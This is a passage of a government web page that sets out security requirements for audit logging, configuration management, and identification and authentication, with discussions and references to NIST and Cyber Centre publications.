disposal.</p> <h5>References</h5> <p>Source controls: AU-11, AU-12<br /> Supporting publications: <a href="https://csrc.nist.gov/pubs/sp/800/92/final">NIST SP 800-92 Guide to Computer Security Log Management</a></p> </details><details><summary><h4 id="03-03-04">03.03.04 Response to audit logging process failures</h4> </summary><ol class="lst-upr-alph"><li>Alert organizational personnel or roles within [Assignment: organization-defined time period] in the event of an audit logging process failure</li> <li>Take the following additional actions: [Assignment: organization-defined additional actions]</li> </ol><h5>Discussion</h5> <p>Audit logging process failures include software and hardware errors, failures in audit log capturing mechanisms, and reaching or exceeding audit log storage capacity. Response actions include overwriting the oldest audit records, shutting down the system, and stopping the generation of audit records. Organizations may choose to define additional actions for audit logging process failures based on the type, location, and severity of the failure, or a combination of such factors. When the audit logging process failure is related to storage, the response is carried out for the audit log storage repository (i.e., the distinct system component where the audit logs are stored), the system on which the audit logs reside, the total audit log storage capacity of the organization (i.e., all audit log storage repositories combined), or all three. Organizations may decide to take no additional actions after alerting designated roles or personnel.</p> <h5>References</h5> <p>Source control: AU-05<br /> Supporting publications: None</p> </details><details><summary><h4 id="03-03-05">03.03.05 Audit record review, analysis, and reporting</h4> </summary><ol class="lst-upr-alph"><li>Review and analyze system audit records [Assignment: organization-defined frequency] for indications and potential impact of inappropriate or unusual activity</li> <li>Report findings to organizational personnel or roles</li> <li>Analyze and correlate audit records across different repositories to gain organization-wide situational awareness</li> </ol><h5>Discussion</h5> <p>Audit record review, analysis, and reporting cover information security- and privacy-related logging performed by organizations and can include logging that results from the monitoring of account usage, remote access, wireless connectivity, configuration settings, the use of maintenance tools and non-local maintenance, system component inventory, mobile device connection, equipment delivery and removal, physical access, temperature and humidity, communications at system interfaces, and the use of mobile code. Findings can be reported to organizational entities, such as the incident response team, help desk, and security or privacy offices. If organizations are prohibited from reviewing and analyzing audit records or unable to conduct such activities, the review or analysis may be carried out by other organizations granted such authority. The scope, frequency, and/or depth of the audit record review, analysis, and reporting may be adjusted to meet organizational needs based on new information received. Correlating audit record review, analysis, and reporting processes helps to ensure that they collectively create a more complete view of events.</p> <h5>References</h5> <p>Source controls: AU-06, AU-06(03)<br /> Supporting publications:</p> <ul><li><a href="https://csrc.nist.gov/pubs/sp/800/86/final">NIST SP 800-86 Guide to Integrating Forensic Techniques into Incident Response </a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/101/r1/final">NIST SP 800-101 Guidelines on Mobile Device Forensics </a></li> </ul></details><details><summary><h4 id="03-03-06">03.03.06 Audit record reduction and report generation</h4> </summary><ol class="lst-upr-alph"><li>Implement an audit record reduction and report generation capability that supports audit record review, analysis, reporting requirements, and after-the-fact investigations of incidents</li> <li>Preserve the original content and time ordering of audit records</li> </ol><h5>Discussion</h5> <p>Audit records are generated in <a href="#03-03-03">Audit record generation 03.03.03</a>. Audit record reduction and report generation occur after audit record generation. Audit record reduction is a process that manipulates collected audit information and organizes it in a summary format that is more meaningful to analysts. Audit record reduction and report generation capabilities do not always come from the same system or organizational entities that conduct auditing activities. An audit record reduction capability can include, for example, modern data mining techniques with advanced data filters to identify anomalous behaviour in audit records. The report generation capability provided by the system can help generate customizable reports. The time ordering of audit records can be a significant issue if the granularity of the time stamp in the record is insufficient.</p> <h5>References</h5> <p>Source control: AU-07<br /> Supporting publications: None</p> </details><details><summary><h4 id="03-03-07">03.03.07 Time stamps</h4> </summary><ol class="lst-upr-alph"><li>Use internal system clocks to generate time stamps for audit records</li> <li>Record time stamps for audit records that meet [Assignment: organization-defined granularity of time measurement] and that use Coordinated Universal Time (UTC), have a fixed local time offset from <abbr title="Coordinated Universal Time">UTC</abbr>, or include the local time offset as part of the time stamp</li> </ol><h5>Discussion</h5> <p>Time stamps generated by the system include the date and time. Time is commonly expressed in <abbr title="Coordinated Universal Time">UTC</abbr> or local time with an offset from <abbr title="Coordinated Universal Time">UTC</abbr>. The granularity of time measurements refers to the degree of synchronization between system clocks and reference clocks (e.g., clocks synchronizing within hundreds or tens of milliseconds). Organizations may define different time granularities for system components. Time service can be critical to other security capabilities (e.g., access control, and identification and authentication), depending on the nature of the mechanisms used to support those capabilities.</p> <h5>References</h5> <p>Source control: AU-08<br /> Supporting publications: None</p> </details><details><summary><h4 id="03-03-08">03.03.08 Protection of audit information</h4> </summary><ol class="lst-upr-alph"><li>Protect audit information and audit logging tools from unauthorized access, modification, and deletion</li> <li>Authorize access to management of audit logging functionality to only a subset of privileged users or roles</li> </ol><h5>Discussion</h5> <p>Audit information includes the information needed to successfully audit system activity, such as audit records, audit log settings, audit reports, and personal information. Audit logging tools are programs and devices used to conduct audit and logging activities. The protection of audit information focuses on technical protection and limits the ability to access and execute audit logging tools to authorized individuals. The physical protection of audit information is addressed by media and physical protection requirements.</p> <p>Individuals or roles with privileged access to a system and who are also the subject of an audit by that system may affect the reliability of the audit information by inhibiting audit activities or modifying audit records. Requiring privileged access to be further defined between audit-related privileges and other privileges limits the number of users or roles with audit-related privileges.</p> <h5>References</h5> <p>Source controls: AU-09, AU-09(04)<br /> Supporting publications: None</p> </details><h4 id="03-03-09">03.03.09 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> </section><!–** TOP OF PAGE ******–><div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <section><h3 class="h2 mrgn-tp-lg" id="3-4">3.4 Configuration management</h3> <p>The Configuration management controls support the management and control of all components of the system such as hardware, software, and configuration items.</p> <!–<section> <h4>In this section</h4> <ul class="list-unstyled"> <li><a href="#03-04-01">03.04.01 Baseline configuration</a></li> <li><a href="#03-04-02">03.04.02 Configuration settings</a></li> <li><a href="#03-04-03">03.04.03 Configuration change control</a></li> <li><a href="#03-04-04">03.04.04 Impact analyses</a></li> <li><a href="#03-04-05">03.04.05 Access restrictions for change</a></li> <li><a href="#03-04-06">03.04.06 Least functionality</a></li> <li><a href="#03-04-07">03.04.07 Not allocated</a></li> <li><a href="#03-04-08">03.04.08 Authorized software&nbsp;– allow by exception</a></li> <li><a href="#03-04-09">03.04.09 Not allocated</a></li> <li><a href="#03-04-10">03.04.10 System component inventory</a></li> <li><a href="#03-04-11">03.04.11 Information location</a></li> <li><a href="#03-04-12">03.04.12 System and component configuration for high-risk areas</a></li> </ul> </section>–> <details><summary><h4 id="03-04-01">03.04.01 Baseline configuration</h4> </summary><ol class="lst-upr-alph"><li>Develop and maintain under configuration control, a current baseline configuration of the system</li> <li>Review and update the baseline configuration of the system [Assignment: organization-defined frequency] and when system components are installed or modified</li> </ol><h5>Discussion</h5> <p>Baseline configurations for the system and system components include aspects of connectivity, operation, and communications. Baseline configurations are documented, formally reviewed, and agreed-upon specifications for the system or configuration items within it. Baseline configurations serve as a basis for future builds, releases, or changes to the system and include information about system components, operational procedures, network topology, and the placement of components in the system architecture. Maintaining baseline configurations requires creating new baselines as the system changes over time. Baseline configurations of the system reflect the current enterprise architecture. If the system facilitates the collection or use of personal information, baseline configurations should include providing privacy notice to users.</p> <h5>References</h5> <p>Source control: CM-02<br /> Supporting publications:</p> <ul><li><a href="https://csrc.nist.gov/pubs/sp/800/124/r2/final">NIST SP 800-124 Guidelines for Managing the Security of Mobile Devices in the Enterprise </a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/128/upd1/final">NIST SP 800-128 Guide for Security-Focused Configuration Management of Information Systems </a></li> </ul></details><details><summary><h4 id="03-04-02">03.04.02 Configuration settings</h4> </summary><ol class="lst-upr-alph"><li>Establish, document, and implement the following configuration settings for the system that reflect the most restrictive mode consistent with operational requirements: [Assignment: organization-defined configuration settings]</li> <li>Identify, document, and approve any deviations from established configuration settings.</li> </ol><h5>Discussion</h5> <p>Configuration settings are the set of parameters that can be changed in hardware, software, or firmware components of the system which affect the security and privacy posture or functionality of the system. Security-related configuration settings can be defined for systems (e.g., servers, workstations), input and output devices (e.g., scanners, copiers, printers), network components (e.g., firewalls, routers, gateways, voice and data switches, wireless access points, network appliances, sensors), operating systems, middleware, and applications.</p> <p>Security parameters are those that impact the security state of the system, including the parameters required to satisfy other security requirements. Security parameters include registry settings; account, file, and directory permission settings (i.e., privileges); and settings for functions, ports, protocols, and remote connections. Privacy parameters are parameters impacting the privacy posture of systems, including those required to satisfy other privacy controls. Privacy parameters include settings for access controls, personal information, data accuracy requirements, data manipulation capabilities, data processing preferences, and information handling and retention permissions. Organizations establish organization-wide configuration settings and subsequently derive specific configuration settings for the system. The established settings become part of the system’s configuration baseline.</p> <p>Common secure configurations (also referred to as security configuration checklists, lockdown and hardening guides, security reference guides, and security technical implementation guides) provide recognized, standardized, and established benchmarks that stipulate secure configuration settings for specific <abbr title="information technology">IT</abbr> platforms/products and instructions for configuring those system components to meet operational requirements. Common secure configurations can be developed by a variety of organizations, including <abbr title="information technology">IT</abbr> product developers, manufacturers, vendors, consortia, academia, industry, federal departments and agencies, and other organizations in the public and private sectors.</p> <h5>References</h5> <p>Source control: CM-06<br /> Supporting publications:</p> <ul><li><a href="/en/guidance/baseline-security-requirements-network-security-zones-version-20-itsp80022">Cyber Centre Baseline Security Requirements for Network Security Zones (ITSP.80.022) </a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/70/r4/final">NIST SP 800-70 National Checklist Program for <abbr title="information technology">IT</abbr> Products: Guidelines for Checklist Users and Developers </a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/126/r3/final">NIST SP 800-126 The Technical Specification for the Security Content Automation Protocol (SCAP): SCAP Version 1.3 </a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/128/upd1/final">NIST SP 800-128 Guide for Security-Focused Configuration Management of Information Systems</a></li> </ul></details><details><summary><h4 id="03-04-03">03.04.03 Configuration change control</h4> </summary><ol class="lst-upr-alph"><li>Define the types of changes to the system that are configuration-controlled</li> <li>Review proposed configuration-controlled changes to the system and approve or disapprove such changes with explicit consideration for security impacts</li> <li>Implement and document approved configuration-controlled changes to the system</li> <li>Monitor and review activities associated with configuration-controlled changes to the system</li> </ol><h5>Discussion</h5> <p>Configuration change control refers to tracking, reviewing, approving or disapproving, and logging changes to the system. Specifically, it involves the systematic proposal, justification, implementation, testing, review, and disposition of changes to the system, including system upgrades and modifications. Configuration change control includes changes to baseline configurations for system components (e.g., operating systems, applications, firewalls, routers, mobile devices) and configuration items of the system, changes to configuration settings, unscheduled and unauthorized changes, and changes to remediate vulnerabilities. This requirement is related to <a href="#03-04-04">Impact analyses 03.04.04</a>.</p> <h5>References</h5> <p>Source control: CM-03<br /> Supporting publications:</p> <ul><li><a href="https://csrc.nist.gov/pubs/sp/800/124/r2/final">NIST SP 800-124 Guidelines for Managing the Security of Mobile Devices in the Enterprise </a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/128/upd1/final">NIST SP 800-128 Guide for Security-Focused Configuration Management of Information Systems </a></li> </ul></details><details><summary><h4 id="03-04-04">03.04.04 Impact analyses</h4> </summary><ol class="lst-upr-alph"><li>Analyze the security and privacy impacts of changes to the system prior to implementation</li> <li>Verify that the security requirements for the system continue to be satisfied after the system changes have been implemented</li> </ol><h5>Discussion</h5> <p>Organizational personnel with security or privacy responsibilities conduct impact analyses that include reviewing security and privacy plans, policies, and procedures to understand security and privacy requirements; reviewing system design documentation and operational procedures to understand how system changes might affect the security and privacy state of the system; reviewing the impacts of changes on supply chain partners with stakeholders; and determining how potential changes to a system create new risks to the privacy of individuals, and the ability to mitigate those risks. Impact analyses also include risk assessments to understand the impacts of changes and to determine whether additional security or privacy requirements are needed. Changes to the system may affect the safeguards and countermeasures previously implemented. This requirement is related to <a href="#03-04-03">Configuration change control 03.04.03</a>. Not all changes to the system are configuration controlled.</p> <h5>References</h5> <p>Source controls: CM-04, CM-04(02)<br /> Supporting publications: <a href="https://csrc.nist.gov/pubs/sp/800/128/upd1/final">NIST SP 800-128 Guide for Security-Focused Configuration Management of Information Systems</a></p> </details><details><summary><h4 id="03-04-05">03.04.05 Access restrictions for change</h4> </summary><p>Define, document, approve, and enforce physical and logical access restrictions associated with changes to the system.</p> <h5>Discussion</h5> <p>Changes to the hardware, software, or firmware components of the system or the operational procedures related to the system can have potentially significant effects on the security of the system or individuals’ privacy. Therefore, organizations permit only qualified and authorized individuals to access the system for the purpose of initiating changes. Access restrictions include physical and logical access controls, software libraries, workflow automation, media libraries, abstract layers (i.e., changes implemented into external interfaces rather than directly into the system), and change windows (i.e., changes occur only during specified times).</p> <h5>References</h5> <p>Source control: CM-05<br /> Supporting publications:</p> <ul><li><a href="https://csrc.nist.gov/pubs/fips/140-3/final">NIST FIPS 140-3 Security Requirements for Cryptographic Modules </a></li> <li><a href="https://csrc.nist.gov/pubs/fips/186-5/final">NIST FIPS 186-5 Digital Signature Standard (DSS) </a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/128/upd1/final">NIST SP 800-128 Guide for Security-Focused Configuration Management of Information Systems </a></li> </ul></details><details><summary><h4 id="03-04-06">03.04.06 Least functionality</h4> </summary><ol class="lst-upr-alph"><li>Configure the system to provide only mission-essential capabilities</li> <li>Prohibit or restrict use of the following functions, ports, protocols, connections, and services: [Assignment: organization-defined functions, ports, protocols, connections, and services]</li> <li>Review the system [Assignment: organization-defined frequency] to identify unnecessary or nonsecure functions, ports, protocols, connections, and services</li> <li>Disable or remove functions, ports, protocols, connections, and services that are unnecessary or nonsecure</li> </ol><h5>Discussion</h5> <p>Systems can provide a variety of functions and services. Some functions and services that are routinely provided by default may not be necessary to support essential organizational missions, functions, or operations. It may be convenient to provide multiple services from single system components. However, doing so increases risk over limiting the services provided by any one component. Where feasible, organizations limit functionality to a single function per component.</p> <p>Organizations review the functions and services provided by the system or system components to determine which functions and services are candidates for elimination. Organizations disable unused or unnecessary physical and logical ports and protocols to prevent the unauthorized connection of devices, transfer of information, and tunneling. Organizations can employ network scanning tools, intrusion detection and prevention systems, and endpoint protection systems (e.g., firewalls and host-based intrusion detection systems) to identify and prevent the use of prohibited functions, ports, protocols, system connections, and services. Bluetooth, File Transfer Protocol (FTP), and peer-to-peer networking are examples of the types of protocols that organizations consider eliminating, restricting, or disabling.</p> <h5>References</h5> <p>Source controls: CM-07, CM-07(01)<br /> Supporting publications:</p> <ul><li><a href="/en/guidance/application-allow-list-itsap10095">Cyber Centre Application Allow Lists (ITSAP.10.095) </a></li> <li><a href="/en/top-top-10-it-security-action-items-no-10-implement-application-allow-lists-itsm10095">Cyber Centre Top 10 <abbr title="information technology">IT</abbr> security action items: No. 10 Implement application allow lists (ITSM.10.095) </a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/160/v1/r1/final">NIST SP 800-160-1 Engineering Trustworthy Secure Systems </a></li> <li>Cyber Centre System lifecycle cyber security and privacy risk management activities (ITSP.10.037)</li> </ul></details><h4 id="03-04-07">03.04.07 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <details><summary><h4 id="03-04-08">03.04.08 Authorized software – allow by exception</h4> </summary><ol class="lst-upr-alph"><li>Identify software programs authorized to execute on the system</li> <li>Implement a deny-all, allow-by-exception policy for the execution of software programs on the system</li> <li>Review and update the list of authorized software programs [Assignment: organization-defined frequency]</li> </ol><h5>Discussion</h5> <p>If provided with the necessary privileges, users can install software in organizational systems. To maintain control over the software installed, organizations identify permitted and prohibited actions regarding software installation. Permitted software installations include updates and security patches to existing software and downloading new applications from organization-approved “app stores.” The policies selected for governing user-installed software are organization-developed or provided by an external entity. Policy enforcement methods can include procedural methods and automated methods.</p> <p>Authorized software programs can be limited to specific versions or from a specific source. To facilitate a comprehensive authorized software process and increase the strength of protection against attacks that bypass application-level authorized software, software programs may be decomposed into and monitored at different levels of detail. These levels include applications, application programming interfaces, application modules, scripts, system processes, system services, kernel functions, registries, drivers, and dynamic link libraries.</p> <h5>References</h5> <p>Source control: CM-07(05)<br /> Supporting publications:</p> <ul><li><a href="/en/guidance/application-allow-list-itsap10095">Cyber Centre Application Allow Lists (ITSAP.10.095) </a></li> <li><a href="/en/top-top-10-it-security-action-items-no-10-implement-application-allow-lists-itsm10095">Cyber Centre Top 10 <abbr title="information technology">IT</abbr> security action items: No. 10 Implement application allow lists (ITSM.10.095) </a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/160/v1/r1/final">NIST SP 800-160-1 Engineering Trustworthy Secure Systems </a></li> </ul></details><h4 id="03-04-09">03.04.09 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <details><summary><h4 id="03-04-10">03.04.10 System component inventory</h4> </summary><ol class="lst-upr-alph"><li>Develop and document an inventory of system components</li> <li>Review and update the system component inventory [Assignment: organization-defined frequency]</li> <li>Update the system component inventory as part of installations, removals, and system updates</li> </ol><h5>Discussion</h5> <p>System components are discrete, identifiable assets (i.e., hardware, software, and firmware elements) that compose a system. Organizations may implement centralized system component inventories that include components from all systems. In such situations, organizations ensure that the inventories include system-specific information required for component accountability. The information necessary for effective accountability of system components includes the system name, software owners, software version numbers, hardware inventory specifications, software license information — and for networked components — the machine names and network addresses for all implemented protocols (e.g., IPv4, IPv6). Inventory specifications include component type, physical location, date of receipt, manufacturer, cost, model, serial number, and supplier information.</p> <h5>References</h5> <p>Source controls: CM-08, CM-08(01)<br /> Supporting publications:</p> <ul><li><a href="https://csrc.nist.gov/pubs/sp/800/124/r2/final">NIST SP 800-124 Guidelines for Managing the Security of Mobile Devices in the Enterprise </a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/128/upd1/final">NIST SP 800-128 Guide for Security-Focused Configuration Management of Information Systems </a></li> </ul></details><details><summary><h4 id="03-04-11">03.04.11 Information location</h4> </summary><ol class="lst-upr-alph"><li>Identify and document the location of specified information and the system components on which the information is processed and stored.</li> <li>Document changes to the system or system component location where specified information is processed and stored.</li> </ol><h5>Discussion</h5> <p>Information location addresses the need to understand the specific system components where specified information is being processed and stored and the users who have access to specified information so that appropriate protection mechanisms can be provided, including information flow controls, access controls, and information management.</p> <h5>References</h5> <p>Source control: CM-12<br /> Supporting publications: None</p> </details><details><summary><h4 id="03-04-12">03.04.12 System and component configuration for high-risk areas</h4> </summary><ol class="lst-upr-alph"><li>Issue systems or system components with the following configurations to individuals traveling to high-risk locations: [Assignment: organization-defined system configurations].</li> <li>Apply the following security requirements to the system or system components when the individuals return from travel: [Assignment: organization-defined security requirements].</li> </ol><h5>Discussion</h5> <p>When it is known that a system or a specific system component will be in a high-risk area, additional security requirements may be needed to counter the increased threat. Organizations can implement protective measures on systems or system components used by individuals departing on and returning from travel. Actions include determining locations of concern, defining the required configurations for the components, ensuring that the components are configured as intended before travel is initiated, and taking additional actions after travel is completed. For example, systems going into high-risk areas can be configured with sanitized hard drives, limited applications, and more stringent configuration settings. Actions applied to mobile devices upon return from travel include examining the device for signs of physical tampering and purging and reimaging the device storage.</p> <h5>References</h5> <p>Source control: CM-02(07)<br /> Supporting publications:</p> <ul><li><a href="https://csrc.nist.gov/pubs/sp/800/124/r2/final">NIST SP 800-124 Guidelines for Managing the Security of Mobile Devices in the Enterprise </a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/128/upd1/final">NIST SP 800-128 Guide for Security-Focused Configuration Management of Information Systems </a></li> </ul></details></section><!–** TOP OF PAGE ******–><div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <section><h3 class="h2 mrgn-tp-lg" id="3-5">3.5 Identification and authentication</h3> <p>The Identification and authentication controls support the unique identification of users, processes acting on behalf of users and devices. They also support the authentication or verification of the identities of those users, processes or devices as a prerequisite to allowing access to organizational systems.</p> <!–<section> <h4>In this section</h4> <ul class="list-unstyled"> <li><a href="#03-05-01">03.05.01 User identification, authentication, and re-authentication</a></li> <li><a href="#03-05-02">03.05.02 Device identification and authentication</a></li> <li><a href="#03-05-03">03.05.03 Multi-factor authentication</a></li> <li><a href="#03-05-04">03.05.04 Replay-resistant authentication</a></li> <li><a href="#03-05-05">03.05.05 Identifier management</a></li> <li><a href="#03-05-06">03.05.06 Not allocated</a></li> <li><a href="#03-05-07">03.05.07 Password management</a></li> <li><a href="#03-05-08">03.05.08 Not allocated</a></li> <li><a href="#03-05-09">03.05.09 Not allocated</a></li> <li><a href="#03-05-10">03.05.10 Not allocated</a></li> <li><a href="#03-05-11">03.05.11 Authentication feedback</a></li> <li><a href="#03-05-12">03.05.12 Authenticator management</a></li> </ul> </section>–> <details><summary><h4 id="03-05-01">03.05.01 User identification, authentication, and re-authentication</h4> </summary><ol class="lst-upr-alph"><li>Uniquely identify and authenticate system users and associate that unique identification with processes acting on behalf of those users</li> <li>Re-authenticate users when [Assignment: organization-defined circumstances or situations requiring re-authentication]</li> </ol><h5>Discussion</h5> <p>System users include individuals (or system processes acting on behalf of individuals) who are authorized to access a system. Typically, individual identifiers are the usernames associated with the system accounts assigned to those individuals. Since system processes execute on behalf of groups and roles, organizations may require the unique identification of individuals in group accounts or accountability of individual activity. The unique identification and authentication of users applies to all system accesses. Organizations employ passwords, physical authenticators, biometrics, or some combination thereof to authenticate user identities. Organizations may re-authenticate individuals in certain situations, including when roles, authenticators, or credentials change; when the execution of privileged functions occurs; after a fixed time period; or periodically.</p> <h5>References</h5> <p>Source controls: IA-02, IA-11<br /> Supporting publications: <a href="https://www.cyber.gc.ca/en/guidance/user-authentication-guidance-information-technology-systems-itsp30031-v3">Cyber Centre User Authentication Guidance for Information Technology Systems (ITSP.30.031)</a></p> </details><details><summary><h4 id="03-05-02">03.05.02 Device identification and authentication</h4> </summary><p>Uniquely identify and authenticate [Assignment: organization-defined devices or types of devices] before establishing a system connection.</p> <h5>Discussion</h5> <p>Devices that require unique device-to-device identification and authentication are defined by type, device, or a combination of type and device. Organization-defined device types include devices that are not owned by the organization. Systems use shared known information (e.g., Media Access Control [MAC], Transmission Control Protocol/Internet Protocol [TCP/IP] addresses) for device identification or organizational authentication solutions (e.g., Institute of Electrical and Electronics Engineers [IEEE] 802.1x and Extensible Authentication Protocol [EAP], RADIUS server with EAP-Transport Layer Security [TLS] authentication, Kerberos) to identify and authenticate devices on local and wide area networks. Public Key Infrastructure (PKI) and certificate revocation checking for the certificates exchanged can also be included as part of device authentication.</p> <h5>References</h5> <p>Source control: IA-03<br /> Supporting publications: <a href="/en/guidance/user-authentication-guidance-information-technology-systems-itsp30031-v3">Cyber Centre User Authentication Guidance for Information Technology Systems (ITSP.30.031) </a></p> </details><details><summary><h4 id="03-05-03">03.05.03 Multi-factor authentication</h4> </summary><p>Implement strong multi-factor authentication (MFA) for access to privileged and non-privileged accounts.</p> <h5>Discussion</h5> <p>This requirement applies to user accounts. Multi-factor authentication requires the use of two or more different factors to achieve authentication. The authentication factors are defined as follows: something you know (e.g., a personal identification number [PIN]), something you have (e.g., a physical authenticator, such as a cryptographic private key), or something you are (e.g., a biometric). Multi-factor authentication solutions that feature physical authenticators include hardware authenticators that provide time-based or challenge-response outputs and smart cards. In addition to authenticating users at the system level, organizations may also employ authentication mechanisms at the application level to provide increased information security.</p> <h5>References</h5> <p>Source controls: IA-02(01), IA-02(02)<br /> Supporting publications: <a href="/en/guidance/user-authentication-guidance-information-technology-systems-itsp30031-v3">Cyber Centre User Authentication Guidance for Information Technology Systems (ITSP.30.031)</a></p> </details><details><summary><h4 id="03-05-04">03.05.04 Replay-resistant authentication</h4> </summary><p>Implement replay-resistant authentication mechanisms for access to privileged and non-privileged accounts.</p> <h5>Discussion</h5> <p>Authentication processes resist replay attacks if it is impractical to successfully authenticate by recording or replaying previous authentication messages. Replay-resistant techniques include protocols that use nonces or challenges, such as time synchronous or challenge-response one-time authenticators.</p> <h5>References</h5> <p>Source control: IA-02(08)<br /> Supporting publications: <a href="/en/guidance/user-authentication-guidance-information-technology-systems-itsp30031-v3">Cyber Centre User Authentication Guidance for Information Technology Systems (ITSP.30.031)</a></p> </details><details><summary><h4 id="03-05-05">03.05.05 Identifier management</h4> </summary><ol class="lst-upr-alph"><li>Receive authorization from organizational personnel or roles to assign an individual, group, role, service, or device identifier</li> <li>Select and assign an identifier that identifies an individual, group, role, service, or device</li> <li>Prevent reuse of identifiers for [Assignment: organization-defined time period]</li> <li>Manage individual identifiers by uniquely identifying each individual as [Assignment: organization-defined characteristic identifying individual status]</li> </ol><h5>Discussion</h5> <p>Identifiers are provided for users, processes acting on behalf of users, and devices. Prohibiting the reuse of identifiers prevents the assignment of previously used individual, group, role, service, or device identifiers to different individuals, groups, roles, services, or devices.</p> <p>Characteristics that identify the status of individuals include contractors, foreign nationals, and non-organizational users. Identifying the status of individuals by these characteristics provides information about the people with whom organizational personnel are communicating. For example, it is useful for an employee to know that one of the individuals on an email message is a contractor.</p> <h5>References</h5> <p>Source controls: IA-04, IA-04(04)<br /> Supporting publications: <a href="/en/guidance/user-authentication-guidance-information-technology-systems-itsp30031-v3">Cyber Centre User Authentication Guidance for Information Technology Systems (ITSP.30.031)</a></p> </details><h4 id="03-05-06">03.05.06 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <details><summary><h4 id="03-05-07">03.05.07 Password management</h4> </summary><ol class="lst-upr-alph"><li>Maintain a list of commonly used, expected, or compromised passwords and update the list [Assignment: organization-defined frequency] and when organizational passwords are suspected to have been compromised</li> <li>Verify that passwords are not found on the list of commonly used, expected, or compromised passwords when users create or update passwords</li> <li>Transmit passwords only over cryptographically protected channels</li> <li>Store passwords in a cryptographically protected form</li> <li>Select a new password upon first use after account recovery</li> <li>Enforce the following composition and complexity rules for passwords: [Assignment: organization-defined composition and complexity rules]</li> </ol><h5>Discussion</h5> <p>Password-based authentication applies to passwords used in single-factor or multi-factor authentication. Long passwords or passphrases are preferable to shorter passwords. Enforced composition rules provide marginal security benefits while decreasing usability. However, organizations may choose to establish and enforce certain rules for password generation (e.g., minimum character length) under certain circumstances. For example, account recovery can occur when a password is forgotten. Cryptographically protected passwords include salted one-way cryptographic hashes of passwords. The list of commonly used, compromised, or expected passwords includes passwords obtained from previous breach corpuses, dictionary words, and repetitive or sequential characters. The list includes context-specific words, such as the name of the service, username, and derivatives thereof. Changing temporary passwords to permanent passwords immediately after system logon ensures that the necessary strength of the authentication mechanism is implemented at the earliest opportunity and reduces the susceptibility to authenticator compromises. Long passwords and passphrases can be used to increase the complexity of passwords.</p> <h5>References</h5> <p>Source control: IA-05(01)<br /> Supporting publications: <a href="/en/guidance/user-authentication-guidance-information-technology-systems-itsp30031-v3">Cyber Centre User Authentication Guidance for Information Technology Systems (ITSP.30.031)</a></p> </details><h4 id="03-05-08">03.05.08 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <h4 id="03-05-09">03.05.09 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <h4 id="03-05-10">03.05.10 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <details><summary><h4 id="03-05-11">03.05.11 Authentication feedback</h4> </summary><p>Obscure feedback of authentication information during the authentication process.</p> <h5>Discussion</h5> <p>Authentication feedback does not provide information that would allow unauthorized individuals to compromise authentication mechanisms. For example, for desktop or notebook computers with relatively large monitors, the threat may be significant (commonly referred to as shoulder surfing). For mobile devices with small displays, this threat may be less significant and is balanced against the increased likelihood of input errors due to small keyboards. Therefore, the means for obscuring the authentication feedback is selected accordingly. Obscuring feedback includes displaying asterisks when users type passwords into input devices or displaying feedback for a limited time before fully obscuring it.</p> <h5>References</h5> <p>Source control: IA-06<br /> Supporting publications: None</p> </details><details><summary><h4 id="03-05-12">03.05.12 Authenticator management</h4> </summary><ol class="lst-upr-alph"><li>Verify the identity of the individual, group, role, service, or device receiving the authenticator as part of the initial authenticator distribution</li> <li>Establish initial authenticator content for any authenticators issued by the organization</li> <li>Establish and implement administrative procedures for initial authenticator distribution, for lost, compromised, or damaged authenticators, and for revoking authenticators</li> <li>Change default authenticators at first use</li> <li>Change or refresh authenticators [Assignment: organization-defined frequency] or when the following events occur: [Assignment: organization-defined events]</li> <li>Protect authenticator content from unauthorized disclosure and modification</li> </ol><h5>Discussion</h5> <p>Authenticators include passwords, cryptographic devices, biometrics, certificates, one-time password devices, and ID badges. The initial authenticator content is the actual content of the authenticator (e.g., the initial password). In contrast, requirements for authenticator content contain specific characteristics. Authenticator management is supported by organization-defined settings and restrictions for various authenticator characteristics (e.g., password complexity and composition rules, validation time window for time synchronous one-time tokens, and the number of allowed rejections during the verification stage of biometric authentication).</p> <p>The requirement to protect individual authenticators may be implemented by <a href="#03-15-03">Rules of behaviour 03.15.03</a> for authenticators in the possession of individuals and by <a href="#03-01-01">Account management 03.01.01</a>, <a href="#03-01-01">Access enforcement 03.01.02</a>, <a href="#03-01-05">Least privilege 03.01.05</a>, and <a href="#03-13-08">Transmission and storage confidentiality 03.13.08</a> for authenticators stored in organizational systems. This includes passwords stored in hashed or encrypted formats or files that contain encrypted or hashed passwords accessible with administrator privileges. Actions can be taken to protect authenticators, including maintaining possession of authenticators, not sharing authenticators with others, and immediately reporting lost, stolen, or compromised authenticators.</p> <p>Developers may deliver system components with factory default authentication credentials to allow for initial installation and configuration. Default authentication credentials are often well-known, easily discoverable, and present a significant risk. Authenticator management includes issuing and revoking authenticators for temporary access when no longer needed. The use of long passwords or passphrases may obviate the need to periodically change authenticators.</p> <h5>References</h5> <p>Source control: IA-05<br /> Supporting publications: <a href="/en/guidance/user-authentication-guidance-information-technology-systems-itsp30031-v3">Cyber Centre User Authentication Guidance for Information Technology 